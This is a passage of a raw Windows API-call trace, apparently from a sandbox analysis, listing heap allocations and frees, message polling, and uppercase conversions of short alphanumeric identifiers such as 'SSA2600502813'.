RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e7020 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0224.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0224.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e01d0 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0224.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0224.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0224.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0224.228] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0048 [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0224.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab290 [0224.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0224.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17c) returned 0x50e0358 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0224.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0224.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0224.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0224.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0224.231] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0224.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0224.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0224.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0224.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0224.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0224.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0224.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0224.235] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0224.235] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0224.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5f0 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0224.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0224.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0224.236] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0224.236] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0224.236] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0224.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0224.236] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0224.237] HeapFree (in: 